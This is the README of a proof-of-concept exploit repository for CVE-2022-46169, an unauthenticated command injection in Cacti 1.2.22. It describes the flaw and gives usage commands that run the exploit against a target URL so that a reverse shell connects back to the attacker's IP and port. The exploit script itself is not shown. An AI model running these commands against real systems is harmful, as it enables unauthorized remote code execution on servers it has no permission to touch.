PoC for CVE-2022-46169 that affects Cacti 1.2.22 version# CVE-2022-46169 POC
This is a Proof of Concept (POC) script for the CVE-2022-46169 vulnerability that affects Cacti version 1.2.22.
## Description
The CVE-2022-46169 vulnerability allows an unauthenticated command injection in Cacti versions through 1.2.22 in order to achieve unauthenticated remote code execution as the www-data user. The vulnerability is caused by improper validation of user input in the "host_id" parameter of the "remote_agent.php" file.
## Usage
```bash
python CVE-2022-46169.py --url <TARGET_URL> --ip <YOUR_IP> --port <YOUR_PORT>
```
Replace <TARGET_URL> with the URL of the target Cacti installation, <YOUR_IP> with the IP address of the machine where you want to receive the reverse shell, and <YOUR_PORT> with the port number where you want to receive the reverse shell.
Example:
```bash
python CVE-2022-46169.py --url http://10.10.11.211 --ip 10.10.14.5 --port 1337
```
## Disclaimer
This POC script is for educational purposes only. Use it at your own risk. The author of this script is not responsible for any damage caused by the use of this script.
References
[CVE-2022-46169 - CVE entry for the vulnerability.](https://nvd.nist.gov/vuln/detail/CVE-2022-46169) \
[Cacti Security Advisories in Github](https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf)
[4.0K] /data/pocs/ef9863ace252fab26c0985bc2d1b272c359e6f0b
├── [2.2K] CVE-2022-46169.py
└── [1.3K] README.md
0 directories, 2 files